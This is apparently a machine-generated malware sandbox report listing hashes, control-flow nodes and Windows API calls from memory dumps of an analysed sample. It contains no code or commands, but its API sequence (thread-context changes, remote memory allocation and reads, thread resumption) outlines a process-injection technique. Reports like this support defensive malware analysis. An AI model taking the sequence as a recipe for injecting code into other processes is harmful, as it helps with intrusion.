                                                                                                                                  • Instruction ID: f9813f3f12075d04f09457883848f81b7b31499de43d689485016ed00be424b2
                                                                                                                                  • Opcode Fuzzy Hash: 5ee17780be8f84ee1512ae77e6afdbea55feb183d3d7ebe520823e48858b2530
                                                                                                                                  • Instruction Fuzzy Hash: 25213971900349DFDB10CFA9C885BDEBBF5FF88320F108429E959A7250C7789954CBA4

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 454 535bb72-535bbc3 457 535bbc5-535bbd1 454->457 458 535bbd3-535bc03 Wow64SetThreadContext 454->458 457->458 460 535bc05-535bc0b 458->460 461 535bc0c-535bc3c 458->461 460->461
                                                                                                                                  APIs
                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0535BBF6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4650208002.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_5350000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 983334009-0
                                                                                                                                  • Opcode ID: a433e4c3bd60b7b0378a0225d71d56f5965b6ed030218acbaa9068a790f12683
                                                                                                                                  • Instruction ID: 964fa710c6069c21de228e5c242132baa9ca0eab9ddf4cb48ae5f9a3e23ac6e6
                                                                                                                                  • Opcode Fuzzy Hash: a433e4c3bd60b7b0378a0225d71d56f5965b6ed030218acbaa9068a790f12683
                                                                                                                                  • Instruction Fuzzy Hash: CD2137719043098FDB10DFAAC485BEEBBF4EF88220F14842AD959A7241CB789944CBA5

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 465 535bb78-535bbc3 467 535bbc5-535bbd1 465->467 468 535bbd3-535bc03 Wow64SetThreadContext 465->468 467->468 470 535bc05-535bc0b 468->470 471 535bc0c-535bc3c 468->471 470->471
                                                                                                                                  APIs
                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0535BBF6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4650208002.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_5350000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 983334009-0
                                                                                                                                  • Opcode ID: 567a79f89ed0ef1509f6cd5aeafeaee4997fa7f624c435414072522c12d51af8
                                                                                                                                  • Instruction ID: 2b65691f103436c8249f5b307f2c84811abed0fbf475434de372e9db9fc40908
                                                                                                                                  • Opcode Fuzzy Hash: 567a79f89ed0ef1509f6cd5aeafeaee4997fa7f624c435414072522c12d51af8
                                                                                                                                  • Instruction Fuzzy Hash: F72134719043098FDB10DFAAC485BAEBBF4AF88220F14842AD959A7241CB789944CBA5

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 475 128d620-128d6b4 DuplicateHandle 476 128d6bd-128d6da 475->476 477 128d6b6-128d6bc 475->477 477->476
                                                                                                                                  APIs
                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0128D6A7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4646828622.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_1280000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DuplicateHandle
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3793708945-0
                                                                                                                                  • Opcode ID: c44ae60a80440dfe662842f64d9faa87774a7601adf0609c7d67519173c6723c
                                                                                                                                  • Instruction ID: 1a6447243bc1e6f3f6aa869e76a3342f2bff256196126730ff2cac84336767bb
                                                                                                                                  • Opcode Fuzzy Hash: c44ae60a80440dfe662842f64d9faa87774a7601adf0609c7d67519173c6723c
                                                                                                                                  • Instruction Fuzzy Hash: 0D21E4B5900219DFDB10CF9AD984ADEBFF4FB48310F14801AE958A7350D374A954CFA5
                                                                                                                                  APIs
                                                                                                                                  • PostMessageW.USER32(?,?,?,?), ref: 061705E5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4652399786.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_6170000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessagePost
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 410705778-0
                                                                                                                                  • Opcode ID: 78b41e8ccbc1ed6f265805a981be4694b0e4d3ba569613cfea593f7a618e38f6
                                                                                                                                  • Instruction ID: 6723f9d4b84fdd386389caf1af810bb692bc70e60b537ecc633a9acb0b3a2076
                                                                                                                                  • Opcode Fuzzy Hash: 78b41e8ccbc1ed6f265805a981be4694b0e4d3ba569613cfea593f7a618e38f6
                                                                                                                                  • Instruction Fuzzy Hash: E62147B58083898FDB01CFA9C985BDEBFF4EB09310F14849AD554A7252C378A948CBA1
                                                                                                                                  APIs
                                                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,00010002), ref: 0535CDF9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4650208002.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_5350000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MemoryProcessRead
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1726664587-0
                                                                                                                                  • Opcode ID: d3f43d41a12ade7bdde06231fb4dcb0d4971c7bbab4eb9a30f13b2996094f5fd
                                                                                                                                  • Instruction ID: 86db38050d6a675da85288bf6aeac808c17bafc2668c000a13b8cce007a856db
                                                                                                                                  • Opcode Fuzzy Hash: d3f43d41a12ade7bdde06231fb4dcb0d4971c7bbab4eb9a30f13b2996094f5fd
                                                                                                                                  • Instruction Fuzzy Hash: E621E2B58003599FDB10CF9AC885BDEFBF4FB48320F10842AE958A7210C378A944CFA5
                                                                                                                                  APIs
                                                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,00010002), ref: 0535CDF9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4650208002.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_5350000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MemoryProcessRead
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1726664587-0
                                                                                                                                  • Opcode ID: 5324278ca99abd28d2297d24d5f8e3ae9a9e50b55fa04f330c44d2203fb846c0
                                                                                                                                  • Instruction ID: 6da03d96994629b2cd0ccbb0b4d42d1f3fc52964fe3c551b387a5cb706053207
                                                                                                                                  • Opcode Fuzzy Hash: 5324278ca99abd28d2297d24d5f8e3ae9a9e50b55fa04f330c44d2203fb846c0
                                                                                                                                  • Instruction Fuzzy Hash: 6621E4B5800359DFDB10CF9AC885BDEBBF4FB48324F10842AE958A7210D374A954CBA5
                                                                                                                                  APIs
                                                                                                                                  • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0535CD3B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4650208002.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_5350000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 983334009-0
                                                                                                                                  • Opcode ID: 473f902a9572b0704f46490a444216bcad95e046479118b36a550c8d0d2e7d23
                                                                                                                                  • Instruction ID: 29da81180dc324c8f9a8f226be39413b1add022b7aa36bb65b336b76e2eac102
                                                                                                                                  • Opcode Fuzzy Hash: 473f902a9572b0704f46490a444216bcad95e046479118b36a550c8d0d2e7d23
                                                                                                                                  • Instruction Fuzzy Hash: 7E1137B1D003498FDB10CF9AC845BDEFBF4FB88224F148129D958A3210D378A545CFA5
                                                                                                                                  APIs
                                                                                                                                  • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0535CD3B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4650208002.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_5350000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 983334009-0
                                                                                                                                  • Opcode ID: 4bfcf7979fbfff555340ab98949d608bb1be7d4eef14ee1256eb81b93a4b30a0
                                                                                                                                  • Instruction ID: 01d484207f0d924ba7f1df16c12ff7dad1db0aa9c82493212e3eef05fd4ff8dd
                                                                                                                                  • Opcode Fuzzy Hash: 4bfcf7979fbfff555340ab98949d608bb1be7d4eef14ee1256eb81b93a4b30a0
                                                                                                                                  • Instruction Fuzzy Hash: 871137B1D043498FDB10CF9AC845BDEFBF4FB88224F548069D958A3610D378A945CFA5
                                                                                                                                  APIs
                                                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0535BDAE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4650208002.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_5350000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                  • Opcode ID: ff71e1a57ec9ebd7da7c9b78e47355193057f4e71b42d0e4197ab8cc379a4f66
                                                                                                                                  • Instruction ID: e4a5d8bcef7844174d0d845ee9d97f8b48b2c6625c2699e7faca63e30afc98f0
                                                                                                                                  • Opcode Fuzzy Hash: ff71e1a57ec9ebd7da7c9b78e47355193057f4e71b42d0e4197ab8cc379a4f66
                                                                                                                                  • Instruction Fuzzy Hash: 6C116A768002499FDB10DFAAC845BDFFBF5EF88320F148419E919A7250C7799554CFA4
                                                                                                                                  APIs
                                                                                                                                  • PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,06179862,00000000,00000000,03ED4108,02EF04DC), ref: 06179CB0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4652399786.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_6170000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessagePeek
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2222842502-0
                                                                                                                                  • Opcode ID: 0b045c60d36c586fac5fe82fa620c4d647b35ad3e99d46c475d175f5fbbed9ec
                                                                                                                                  • Instruction ID: 6289e11d785c0187ecfeaa0872605a0e51491f3df6e9fdbd8b786859e230cc2c
                                                                                                                                  • Opcode Fuzzy Hash: 0b045c60d36c586fac5fe82fa620c4d647b35ad3e99d46c475d175f5fbbed9ec
                                                                                                                                  • Instruction Fuzzy Hash: 941129B1C04249DFDB10CF9AD544BDEBBF4FB48310F108429E554A7250D378A544CFA5
                                                                                                                                  APIs
                                                                                                                                  • PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,06179862,00000000,00000000,03ED4108,02EF04DC), ref: 06179CB0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4652399786.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_6170000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessagePeek
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2222842502-0
                                                                                                                                  • Opcode ID: 5149b8cdec0f7e46d6fce974a7422786e6dac037f96a8b9a7b1d130e61dce9df
                                                                                                                                  • Instruction ID: 67beaac58b61454aa9535dce32a62c18275b9bd60f00052bcd153ce34198eef7
                                                                                                                                  • Opcode Fuzzy Hash: 5149b8cdec0f7e46d6fce974a7422786e6dac037f96a8b9a7b1d130e61dce9df
                                                                                                                                  • Instruction Fuzzy Hash: FA11F3B5C00249DFDB10CF9AD945BDEBBF8EB48360F10842AE958A3250C378A954DFA5
                                                                                                                                  APIs
                                                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0535BDAE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4650208002.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_5350000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                  • Opcode ID: fd162a31b1a3259fcde984402f9bce5b7fde92650040df415c1c138abe508e1e
                                                                                                                                  • Instruction ID: 4fb391a5c65cd2c570bb299b37c2bc58d5fa67d89ff7fdf12687a148ed184b61
                                                                                                                                  • Opcode Fuzzy Hash: fd162a31b1a3259fcde984402f9bce5b7fde92650040df415c1c138abe508e1e
                                                                                                                                  • Instruction Fuzzy Hash: 271137718002499FDB10DFAAC845BEFFBF5EF88320F148419E519A7250C7799550CFA5
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4650208002.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_5350000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ResumeThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                  • Opcode ID: 8b1751197c8d11cdd46787d38ce97ba1bdf379c94fd2eed8bf7377cae60b38b3
                                                                                                                                  • Instruction ID: f0cc98ec6eb8d9be945b83f01b99544e99a9f0f06b61d84ebb4dd2dddc87d9c1
                                                                                                                                  • Opcode Fuzzy Hash: 8b1751197c8d11cdd46787d38ce97ba1bdf379c94fd2eed8bf7377cae60b38b3
                                                                                                                                  • Instruction Fuzzy Hash: 191158718003498FDB10DFAAD455BEFFBF4EF88620F24841AD51AA7250C779A944CFA4
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4650208002.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_5350000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ResumeThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                  • Opcode ID: 0e5ead527988e36eddd047869bc118831c0093063d91113068bac2f9997a1a8b
                                                                                                                                  • Instruction ID: 4a69c5559f3067f8f526a3f88796adb2bf5c71d2179f087f081fcdd39430a7ef
                                                                                                                                  • Opcode Fuzzy Hash: 0e5ead527988e36eddd047869bc118831c0093063d91113068bac2f9997a1a8b
                                                                                                                                  • Instruction Fuzzy Hash: 251158718003498FDB10DFAAC445BAEFBF4AF88620F248419C51AA7250C775A940CB94
                                                                                                                                  APIs
                                                                                                                                  • PostMessageW.USER32(?,?,?,?), ref: 061705E5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4652399786.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_6170000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessagePost
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 410705778-0
                                                                                                                                  • Opcode ID: e225f117a828b0fdd6568818061de32ff06901dca93090cab517c35c60484c58
                                                                                                                                  • Instruction ID: 71867e9fb38eb15665fc566be3b4f7f042a89d7b3ebfc60b5096e29c55121342
                                                                                                                                  • Opcode Fuzzy Hash: e225f117a828b0fdd6568818061de32ff06901dca93090cab517c35c60484c58
                                                                                                                                  • Instruction Fuzzy Hash: F21103B5800349DFDB10CF9AC945BEEFBF8EB48320F10845AE558A7250D379A984CFA5
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0128AF9E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4646828622.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_1280000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HandleModule
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4139908857-0
                                                                                                                                  • Opcode ID: 5e976b558af4ff5a1c2f6a86c3bd512494c78de39a4c5f9135ffc3a5fa64d824
                                                                                                                                  • Instruction ID: f4f0a35ba5d84216d60b6337bc053651aead0dd2c03c2f77f922c01c3e68ccdf
                                                                                                                                  • Opcode Fuzzy Hash: 5e976b558af4ff5a1c2f6a86c3bd512494c78de39a4c5f9135ffc3a5fa64d824
                                                                                                                                  • Instruction Fuzzy Hash: AF1110B5C012498FDB10DF9AC444BDEFBF4EF88224F10841AD919A7250C379A545CFA5
                                                                                                                                  APIs
                                                                                                                                  • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,061799A7), ref: 0617A445
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4652399786.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_6170000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DispatchMessage
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2061451462-0
                                                                                                                                  • Opcode ID: b7ca407f561fe035fe8e9a74d8131dc0079ad8311a3b16717fb996fb1a4418e7
                                                                                                                                  • Instruction ID: 47fc16afed8d6caea6f13ac4f8b4110189f9f10e1b79973faea35205897f081b
                                                                                                                                  • Opcode Fuzzy Hash: b7ca407f561fe035fe8e9a74d8131dc0079ad8311a3b16717fb996fb1a4418e7
                                                                                                                                  • Instruction Fuzzy Hash: E111EDB1C046498FDB20CF9AD548B9EFBF4FB48224F10846AE559A7210D379A544CFA5
                                                                                                                                  APIs
                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 06171F1D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4652399786.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_6170000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Initialize
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2538663250-0
                                                                                                                                  • Opcode ID: 99a0ce8f0ad6e352474f271d9c71250a558d48dc9d751452dc87bfb2c46e3643
                                                                                                                                  • Instruction ID: e4eee121452fe017a1078b6ccaf73a0a50f178a0683d1477b79d220ae736f31e
                                                                                                                                  • Opcode Fuzzy Hash: 99a0ce8f0ad6e352474f271d9c71250a558d48dc9d751452dc87bfb2c46e3643
                                                                                                                                  • Instruction Fuzzy Hash: F11145B1804308DFDB60DF9AC545BDEBBF4EB48320F248459D619A7200C374A944CFA5
                                                                                                                                  APIs
                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 06171F1D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4652399786.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_6170000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Initialize
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2538663250-0
                                                                                                                                  • Opcode ID: a4d117305c0c6a5f03198367eee511a75e0a4a38f67ef07fa71c105375265413
                                                                                                                                  • Instruction ID: fc69697ab767c9187d8b58fe840961c1bc526b25b6cb10802232b55c5a760f6a
                                                                                                                                  • Opcode Fuzzy Hash: a4d117305c0c6a5f03198367eee511a75e0a4a38f67ef07fa71c105375265413
                                                                                                                                  • Instruction Fuzzy Hash: 7C1142B5800348CFDB10DF9AD485BDEBBF4EB48320F24841AE619A3200C338A944CFA5
                                                                                                                                  APIs
                                                                                                                                  • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,061799A7), ref: 0617A445
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4652399786.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_6170000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DispatchMessage
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2061451462-0
                                                                                                                                  • Opcode ID: 5a3d45b299479cac841dfc2a39e4289fb095b2fa4c104315a39a7d1b2e1572e8
                                                                                                                                  • Instruction ID: 1e9b2c5032e7f465912e394749eec14cc02fef6c60d2f97187bd3a2f601d4c9b
                                                                                                                                  • Opcode Fuzzy Hash: 5a3d45b299479cac841dfc2a39e4289fb095b2fa4c104315a39a7d1b2e1572e8
                                                                                                                                  • Instruction Fuzzy Hash: A511FEB5C046498FCB10CF9AD949BDEFBF4EB48324F14841AE559B3210D379A544CFA5
                                                                                                                                  APIs
                                                                                                                                  • SetWindowLongW.USER32(?,?,?), ref: 05351B95
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4650208002.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_5350000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LongWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1378638983-0
                                                                                                                                  • Opcode ID: 5cabe820b28b63318f8e71280798270ef303641973078274626f61ab77f29aaa
                                                                                                                                  • Instruction ID: 9d78874664bc3867cb331db6e6e61eee874bdfc16ddcc0f506e57d2e7a73b798
                                                                                                                                  • Opcode Fuzzy Hash: 5cabe820b28b63318f8e71280798270ef303641973078274626f61ab77f29aaa
                                                                                                                                  • Instruction Fuzzy Hash: 141112B5800249CFDB10CF9AC585BDEFBF8EB88320F20841AD959A7300D375A944CFA5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4646172866.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_10ad000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2081d480703ea4dd08f294678a07efd534f48912567ef2aa11722a3197487014
                                                                                                                                  • Instruction ID: cdd5b4596589ff1242007d4d3be8a684b65c36efe6f195a74dd853ac27cd78dd
                                                                                                                                  • Opcode Fuzzy Hash: 2081d480703ea4dd08f294678a07efd534f48912567ef2aa11722a3197487014
                                                                                                                                  • Instruction Fuzzy Hash: 2C214572500204DFDB01DF84D9C0B5ABFA5FB88324F60C1ADE9490F656C73AE446CBA1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4646567379.00000000011BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BD000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_11bd000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: fc369747dc408352b50bd7f13b79cb8daef34ac8d9367f0ad893e47ca8edc959
                                                                                                                                  • Instruction ID: 406e98ec2a58df5c4bf27a6badf094586b2abfcb12bdd0936cd6dc7255c970f2
                                                                                                                                  • Opcode Fuzzy Hash: fc369747dc408352b50bd7f13b79cb8daef34ac8d9367f0ad893e47ca8edc959
                                                                                                                                  • Instruction Fuzzy Hash: 96212271604200DFDF1DDF58E9C0B56BB61EB88318F20C5ADE90A4B282C33AD447CA62
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4646567379.00000000011BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BD000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_11bd000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6f8eb45419e7677cbafda44ff1ad8c4bf892c9aff67be8253878fa43cef68338
                                                                                                                                  • Instruction ID: 877622d7906572a6852f26707545709dc7f4bf33203b410b4a59a294f720c8b2
                                                                                                                                  • Opcode Fuzzy Hash: 6f8eb45419e7677cbafda44ff1ad8c4bf892c9aff67be8253878fa43cef68338
                                                                                                                                  • Instruction Fuzzy Hash: EC21FFB1508244DFDF0D9F54E9C0B6ABB65FB88328F24C569E8090B253C33AD446CAA2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4646567379.00000000011BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BD000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_11bd000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9d5536c8a621689a8ef5af54d6170ca443e0effdcde1947f0877e848bc5c4533
                                                                                                                                  • Instruction ID: f1c4d98d0d8ac6916bd9a5f1f2c25c255f5c48593b7a69e9e2d5bfadb5415a64
                                                                                                                                  • Opcode Fuzzy Hash: 9d5536c8a621689a8ef5af54d6170ca443e0effdcde1947f0877e848bc5c4533
                                                                                                                                  • Instruction Fuzzy Hash: DF2180755083809FCB06CF64D9D4B11BF71EB46218F28C5DAD8498F2A7C33A9816CB62
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4646172866.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_10ad000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 347ceff61f71c01d8d79cfdbd8358f6f0be4c31f492294fd5b1d002aa0560fbf
                                                                                                                                  • Instruction ID: 219dc45c91ef718c954f4f0f06e98a368a02710da09b0fb8df71e9a7164e6a73
                                                                                                                                  • Opcode Fuzzy Hash: 347ceff61f71c01d8d79cfdbd8358f6f0be4c31f492294fd5b1d002aa0560fbf
                                                                                                                                  • Instruction Fuzzy Hash: 3B110376404240CFDB02CF84D5C4B56BFB1FB84324F24C2A9D8490B657C33AE456CBA1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4646567379.00000000011BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BD000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_11bd000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 7446d2c010be365be41eb5dc0cb1b2bfcd5ded7fd4e3a0164d9a4b9e20566540
                                                                                                                                  • Instruction ID: d68d444ec356df5f5d20f040b3baf2fc4047c03daec90ab5e53a85255632d4a8
                                                                                                                                  • Opcode Fuzzy Hash: 7446d2c010be365be41eb5dc0cb1b2bfcd5ded7fd4e3a0164d9a4b9e20566540
                                                                                                                                  • Instruction Fuzzy Hash: 1B11E2B5508280CFCB0ACF14E5C0B59FF61FB84328F24C6A9D8490B653C33AD406CBA1
